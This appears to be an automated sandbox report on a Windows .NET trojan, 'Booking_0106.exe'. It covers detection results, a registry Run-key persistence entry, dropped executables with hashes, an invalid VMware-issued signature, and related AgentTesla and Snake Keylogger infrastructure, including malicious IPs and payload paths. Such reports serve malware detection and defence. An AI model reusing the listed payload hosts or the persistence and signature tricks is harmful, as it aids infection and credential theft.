Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Booking_0106.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@12/8@1/3
EGA Information:	Successful, ratio: 85.7%
HCA Information:	Successful, ratio: 91% Number of executed functions: 367 Number of non-executed functions: 37
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 104.208.16.94
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com, onedsblobprdcus16.centralus.cloudapp.azure.com
Execution Graph export aborted for target doc-d.exe, PID 7588 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
04:41:04	API Interceptor	17822x Sleep call for process: doc-d.exe modified
04:41:06	API Interceptor	21x Sleep call for process: Booking_0106.exe modified
04:41:19	API Interceptor	37x Sleep call for process: ibrzb.exe modified
04:42:00	API Interceptor	1x Sleep call for process: WerFault.exe modified
09:41:08	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ibrzb C:\Users\user\AppData\Roaming\ibrzb.exe
09:41:16	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ibrzb C:\Users\user\AppData\Roaming\ibrzb.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
172.86.66.70	purchase order.exe	Get hash	malicious	Snake Keylogger	Browse	172.86.66.70/y3/Tzxjiauolcg.mp3
	Ref_336210627.exe	Get hash	malicious	Snake Keylogger	Browse	172.86.66.70/y3/Lusnteor.mp3
	Ref_5010_103.exe	Get hash	malicious	AgentTesla	Browse	172.86.66.70/y3/Ytwqwkbwu.vdf
	Ship_Doc_18505.exe	Get hash	malicious	AgentTesla	Browse	172.86.66.70/y3/Jwxjanz.dat
162.254.34.31	Ref_5010_103.exe	Get hash	malicious	AgentTesla	Browse
	Ship_Doc_18505.exe	Get hash	malicious	AgentTesla	Browse
	Booking-103.exe	Get hash	malicious	AgentTesla	Browse
	Ref Cheque 705059.vbe	Get hash	malicious	AgentTesla	Browse
	INVOICE AA MARINE CONTRACTING 92900202002-PDF.exe	Get hash	malicious	AgentTesla	Browse
	Request For Quote document.exe	Get hash	malicious	AgentTesla	Browse
	REF DOCUMENTS.js	Get hash	malicious	AgentTesla	Browse
	Booking_261.exe	Get hash	malicious	AgentTesla, Clipboard Hijacker	Browse
	Payment Confirmation Documents.vbe	Get hash	malicious	AgentTesla	Browse
	Book_0256103.vbe	Get hash	malicious	AgentTesla	Browse
172.67.74.152	file.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	RDPWrap Tool	Browse	api.ipify.org/
	Prismifyr-Install.exe	Get hash	malicious	Node Stealer	Browse	api.ipify.org/
	2zYP8qOYmJ.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Stealc, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	api.ipify.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
api.ipify.org	App_installer32_64x.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	172.67.74.152
	setup_run.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	172.67.74.152
	QUOTATIONS#08673.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	c42oX67S73.ps1	Get hash	malicious	Unknown	Browse	104.26.13.205
	UwBqqeMnswLwstaa.ps1	Get hash	malicious	Unknown	Browse	172.67.74.152
	CHDLSHtWbSRCfzJMtDO.ps1	Get hash	malicious	Unknown	Browse	104.26.13.205
	QUOTATIONS#08671.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	New order.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	WarzoneCheat.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.12.205
	Purchase Order.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
VIVIDHOSTINGUS	ADNOC requesting RFQ.exe	Get hash	malicious	FormBook	Browse	162.254.34.125
	Ref_5010_103.exe	Get hash	malicious	AgentTesla	Browse	162.254.34.31
	Ship_Doc_18505.exe	Get hash	malicious	AgentTesla	Browse	162.254.34.31
	Booking-103.exe	Get hash	malicious	AgentTesla	Browse	162.254.34.31
	Ref Cheque 705059.vbe	Get hash	malicious	AgentTesla	Browse	162.254.34.31
	INVOICE AA MARINE CONTRACTING 92900202002-PDF.exe	Get hash	malicious	AgentTesla	Browse	162.254.34.31
	Request For Quote document.exe	Get hash	malicious	AgentTesla	Browse	162.254.34.31
	REF DOCUMENTS.js	Get hash	malicious	AgentTesla	Browse	162.254.34.31
	Booking_261.exe	Get hash	malicious	AgentTesla, Clipboard Hijacker	Browse	162.254.34.31
	http://openlin.online/w.php	Get hash	malicious	Unknown	Browse	162.254.33.21
M247GB	DSpWOKW7zn.rtf	Get hash	malicious	Remcos	Browse	185.236.203.101
	81zBpBAWwc.exe	Get hash	malicious	RHADAMANTHYS	Browse	82.102.27.163
	file.dll	Get hash	malicious	Matanbuchus	Browse	193.109.85.31
	bomb.exe	Get hash	malicious	Amadey, Go Injector, LummaC Stealer, Phorpiex, PureLog Stealer, Stealc, Vidar	Browse	91.202.233.141
	Formularz instrukcji p#U0142atno#U015bci Millennium.xls	Get hash	malicious	Remcos	Browse	185.236.203.101
	http://toomdexter.kindofx.com/c/2734/14-13347393/2/	Get hash	malicious	Unknown	Browse	5.183.103.118
	8cpJOWLf79.rtf	Get hash	malicious	Remcos	Browse	89.238.176.21
	nJohIBtNm5.exe	Get hash	malicious	LummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, RedLine	Browse	91.202.233.158
	novo.arm64.elf	Get hash	malicious	Mirai, Moobot	Browse	38.202.249.53
	novo.arm7.elf	Get hash	malicious	Mirai, Moobot	Browse	38.95.109.126
CLOUDFLARENETUS	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	Confirm Me.exe	Get hash	malicious	STRRAT	Browse	104.20.3.235
	PInstaller.exe	Get hash	malicious	STRRAT	Browse	104.20.3.235
	file.exe	Get hash	malicious	LummaC	Browse	172.67.151.30
	updater.exe	Get hash	malicious	Xmrig	Browse	172.67.162.29
	file.exe	Get hash	malicious	LummaC	Browse	172.67.151.30
	http://www.grandsignatureyercaud.com/	Get hash	malicious	Unknown	Browse	104.21.51.144
	http://www.nesianlife.com/	Get hash	malicious	Unknown	Browse	104.18.39.195
	https://daf2019.com/8/02	Get hash	malicious	Unknown	Browse	172.65.190.172
	https://wtm.entree-plat-dessert.com/r/eNqtj01vgkAQhn8NvVXcL1gOplGBqgUraGrx0gC7iquAwqLVX99Ve2iT9ubMHN6ZyeSd56hbEBqA6oCbGCPCAQM0phBhC7IUJHBp4phQznVAEdGxSfQEotRYwjYyKWMGQTFoQwMCK4mxCmupt1U2+lPTyaTc1RrqatBVxVmLF7Li/HG3jeUj43XNK9lKy/yyRy7nGrJv32jQUHf2UdkpuVfSXC6C9bAo5mAqNzN3IcLBoB0KacxNSptTOZpGXmrlfX/q7OFn8n7yUEaceiRW/VPoRudGgwT2crMOCCGr4Xl86V1zIgp5juC1sfd2lCXe8KU7Pryth8GiG+RWUUQEilF2skVEzh6ejS3PwcBeGTPfB5zNXTo5YPHsrF+vDscJq+zellaxHwrkrW62I0kdAcp+Qvz5oCw3ySY+bGyF1sj8oy6bKr2wF9vvSc7ZusnVJOMx49UDSzt34P9N/4P9DuR/cP9H/QVY0sGG	Get hash	malicious	Unknown	Browse	188.114.96.3

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	https://daf2019.com/8/02	Get hash	malicious	Unknown	Browse	172.67.74.152
	http://ofreverence.neocities.org/	Get hash	malicious	Unknown	Browse	172.67.74.152
	stubInf.exe	Get hash	malicious	Xmrig	Browse	172.67.74.152
	file.exe	Get hash	malicious	Credential Flusher	Browse	172.67.74.152
	Quote_ECM129_ Kumbih III.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.74.152
	INVOICE-COAU7230734290.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.74.152
	Narudzba ACH0036173.vbe	Get hash	malicious	FormBook, GuLoader	Browse	172.67.74.152
	Windows PowerShell.lnk	Get hash	malicious	Unknown	Browse	172.67.74.152
	sj9eYmr725.exe	Get hash	malicious	Quasar	Browse	172.67.74.152
	iOD95iHt4G.exe	Get hash	malicious	Unknown	Browse	172.67.74.152

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_doc-d.exe_5e585b193ca090cc6ffb3bcf3496af387fd1ff80_9cecdc5f_ec8e2bef-f1b2-4b14-92bf-16376956ae86\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.1040365286806255
Encrypted:	false
SSDEEP:	192:ioCpszrB0BU/KaGcJb/qzuiFQZ24IO85:hCSz+BU/Ka31CzuiFQY4IO85
MD5:	F26F366334090E6D7F060EB753439ADA
SHA1:	2A84CA5C25112A82F69F0CAB8C7A7652E45F3872
SHA-256:	4A32FD25938EA8C6C0AC062D27ABCF4597D4F4A4659435D793307F3EA70221EA
SHA-512:	1DAF13CAE1A2156670AB049087AE36F142AAA657FA622E8C663ABF1F00AE17FBAEF508E0E2B59943A0B435D786BFDBF5B12E3001158E68ECCB0A597495C58237
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.6.7.7.7.0.7.8.8.5.0.8.0.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.6.7.7.7.0.8.8.0.7.0.5.2.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.c.8.e.2.b.e.f.-.f.1.b.2.-.4.b.1.4.-.9.2.b.f.-.1.6.3.7.6.9.5.6.a.e.8.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.9.2.c.6.0.8.1.-.9.f.3.b.-.4.9.a.1.-.a.b.a.d.-.f.4.6.0.7.3.4.1.f.6.a.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.d.o.c.-.d...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.d.o.c.-.d...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.a.4.-.0.0.0.1.-.0.0.1.4.-.7.0.c.7.-.d.f.7.a.c.b.1.7.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.3.3.1.3.a.5.b.7.7.7.3.d.c.6.e.e.a.0.9.f.b.f.e.b.8.f.0.f.f.2.7.b.0.0.0.0.0.0.0.0.!.0.0.0.0.3.c.4.3.3.4.8.f.d.b.c.b.b.2.5.f.6.a.1.4.5.d.3.2.c.6.0.4.f.7.6.8.4.4.9.9.4.c.3.f.!.d.o.c.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6909.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Sun Oct 6 08:41:48 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	316490
Entropy (8bit):	3.62881735212465
Encrypted:	false
SSDEEP:	1536:/C/Sl5Y71LuBojRupN4uE2aOAQfJnnNWLTgzFPoSVXyxAQwY2gBuQt4CD40W7Lto:/Csaj44uEqThwLTg5oy/Y2gLz40GXcn
MD5:	020EA1FFB1DFD7F685F75B3F60297F62
SHA1:	F7AF2EE0FC3631D8A9FAA9AD42DDDD6005D310F7
SHA-256:	6617B436BC7C9D9C7F1F307FBE2B4384526BCBBA15CD39F74BFADA4018455344
SHA-512:	B7D787921580C13913BFA0F608D2265534674A5484DE4730561D528807612BE431FB138C0BBC3FF8D3E559D134A7060F957BDD56B3030AB5CF64A1E72C517664
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... .......LM.g............d...........T...x.......<....#.......,..Bc..........`.......8...........T...........hC..............$...........%..............................................................................eJ.......&......GenuineIntel............T........... M.g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6A81.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	6386
Entropy (8bit):	3.7137394897580855
Encrypted:	false
SSDEEP:	96:RSIU6o7wVetbkB/6jSDYZjdQE/fZRV5aM4U2Cx89bgJsfVAm:R6l7wVeJy/6yYZZfpr2A89bgJsfVAm
MD5:	4E57CEFC0DA04F49776D01DE64D4F54E
SHA1:	757487ED47958040061DF43973B8D861280FC282
SHA-256:	D595586DD4DFABEE678E06DBFE9E77B700D139A8AAB25630E82F0341764CF973
SHA-512:	8CACC37179F646F0AB24CB2F5B4423439BA206F5C5D823C56B899AE4A986FF0D04544CBC852FA498B6CB4771DC10A124CB8B795AF1C439A67B74CF2366036F3C
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.5.8.8.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6AF0.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4735
Entropy (8bit):	4.44838863836958
Encrypted:	false
SSDEEP:	48:cvIwWl8zsgrJg77aI9fMWpW8VYhYm8M4JOU7FTo+q8vpUozD4Xld:uIjf8I7hl7VpJoK1zD4Vd
MD5:	7AE86527909385B55ACE73D69E65FE9D
SHA1:	5564CABA4D16E38FA1FDFB092BD05320E01659A0
SHA-256:	2C051B87F223A4A57CF88AAD3EB0F0ADFF2405CA10ED98D27081FEC317BE0E06
SHA-512:	C70B15684847287F3CF7106D7A85BED0B0822EBACFBBBF51EC5C98FAA61B6AC6BAFB1F718ABABAAB304A464BB62E85849B6920914C2C77C7E9A6B3DAFB6E71B5
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="531344" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Temp\doc-d.exe

Download File

Process:	C:\Users\user\Desktop\Booking_0106.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	15872
Entropy (8bit):	5.649764265920142
Encrypted:	false
SSDEEP:	384:jnCSoDBS2d1fzDzEGTmVbG8TcSskc/aw9BsjgpQQ5coKq:j7oF3d1rEGmTc5+Uu+lX
MD5:	C9EF77CA68F77B6C1267A7314203C94B
SHA1:	3C43348FDBCBB25F6A145D32C604F76844994C3F
SHA-256:	FBCDFA1A6FB23286F43C1AC9CF45DC4BE64F328CF1C719ABE7FB503021BF9E3D
SHA-512:	4893A117704EDA88E3A8FC5E0D68C2B70DA2A0FD439BAAE46B717AE41862F910CA4416FE2D89B7113722862A96ED746B1710F33643BF927F63A325542382BAF6
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Virustotal, Detection: 47%, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.................4...........S... ...`....@.. ....................................`..................................S..W....`..P............................................................................ ............... ..H............text....3... ...4.................. ..`.rsrc...P....`.......6..............@..@.reloc...............<..............@..B.................S......H........;...............:..<............................................0..q....... }J... ....a.s.............s........Y....o...........-.s.............o....... `J.{X.affefeeffe ..P/.Y.Yffeeffefea...-..+...o........,... .m..X.affefefeeffea...-..+...o.............(....(....,.. ...~.Y.X.Xa.~.....`.....8.......(....,T....(....,&.. ....a.Yfeffeefef.Ya...~....`.....+I.~....`...... ...~.Y.afefeffeefa.+&..~....`...... .....a.Yfeffeefeffe.Ya.~.....X.....*....0..........~.......o...

C:\Users\user\AppData\Roaming\ibrzb.exe

Download File

Process:	C:\Users\user\Desktop\Booking_0106.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	2002368
Entropy (8bit):	7.371428523371979
Encrypted:	false
SSDEEP:	49152:2RvAXWfY323knu/nL1Pv4ZWrgN4l07QfR0feTtH8FmmCCCCCvaFK3:UfrU2pSsF8FmmCCCCCL3
MD5:	219BC0B3320F5F73D684F07800C0134D
SHA1:	867ABE30A0018C0C902F11A9EDFB7C0262CDEDF5
SHA-256:	4D7489C7F5C86E43100B25314F49F3577D43AE47E090B0916578DA82EC3D59E6
SHA-512:	4BEC94A472BDBD156F22BD4EDDB44BB8B2C11910E4C12269FA73A7F71F4F290DB4EB9014BF5E1BA322C97AF7A195081821D35848B6EA93DCE5E05A18CD6C88A4
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 61% Antivirus: Virustotal, Detection: 67%, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.................n..........j.... ........@.. ....................................`.....................................W....................d...)........................................................... ............... ..H............text...pl... ...n.................. ..`.rsrc................p..............@..@.reloc...............b..............@..B................L.......H........>.. M......#...`....{............................................s{...}......}......}.....(.........{...."..}.........{...."..}.........{...."..}........0..)........\|....%(\|...-.&#........+.(}......(~...i....0..E.........l(....s....}.....{.....~.......(\|...-..+...(}....(....9......(.......f.(.....(....._.3...}......f.(.....(....._.3...}..........0...........(....9.....(....%-.&.+..(....%-.&~........(......-h.{..........(.......(......-?...(....%.}......}.

C:\Users\user\AppData\Roaming\ibrzb.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\Booking_0106.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.465745359647885
Encrypted:	false
SSDEEP:	6144:/IXfpi67eLPU9skLmb0b4VWSPKaJG8nAgejZMMhA2gX4WABl0uNVdwBCswSbu:wXD94VWlLZMM6YFHL+u
MD5:	39C15D664972477F5F0DA5596BD87666
SHA1:	C924D765828DE3DB8C72A4BA74D66EE97C7861B4
SHA-256:	D3F1525628F52866161AFEC9601B8F2071DDAE704EE1251AE2B36AD4739162FC
SHA-512:	4C370F886F93EEC636F73FB2C47FFEB052436729979A9BD9CDCC60BBF6B9BC2B388FAE4DE9A84BF858518D1C55B6E7C8D612068035A67E7ECE440EAAF6205E31
Malicious:	false
Preview:	regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.....................................................................................................................................................................................................................................................................................................................................................M..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.371428523371979
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Booking_0106.exe
File size:	2'002'368 bytes
MD5:	219bc0b3320f5f73d684f07800c0134d
SHA1:	867abe30a0018c0c902f11a9edfb7c0262cdedf5
SHA256:	4d7489c7f5c86e43100b25314f49f3577d43ae47e090b0916578da82ec3d59e6
SHA512:	4bec94a472bdbd156f22bd4eddb44bb8b2c11910e4c12269fa73a7f71f4f290db4eb9014bf5e1ba322c97af7a195081821d35848b6ea93dce5e05a18cd6c88a4
SSDEEP:	49152:2RvAXWfY323knu/nL1Pv4ZWrgN4l07QfR0feTtH8FmmCCCCCvaFK3:UfrU2pSsF8FmmCCCCCL3
TLSH:	0A95BF813794DA2BC40F2AB396B983B02776E78E8797E74E2607B7312F833455447267
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.................n..........j.... ........@.. ....................................`................................

File Icon


Icon Hash:	929296929e9e8e73

Static PE Info

General

Entrypoint:	0x5b8c6a
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x66FD1389 [Wed Oct 2 09:34:01 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	04/05/2022 01:00:00 05/05/2024 00:59:59
Subject Chain	CN="VMware, Inc.", O="VMware, Inc.", L=Palo Alto, S=California, C=US, SERIALNUMBER=2853894, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.2=Delaware, OID.1.3.6.1.4.1.311.60.2.1.3=US
Version:	3
Thumbprint MD5:	E952656E95A95C1449C2A741130267B5
Thumbprint SHA-1:	0AD116E8D49DCC487A04FAC2FBCCB53FD6721013
Thumbprint SHA-256:	3518995D983C041C80E4EBDD664252B6D2AE342B305B4A3A1611FC4FC501E0EB
Serial:	08579742A953BAD90D4237A3F3E38C5E

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
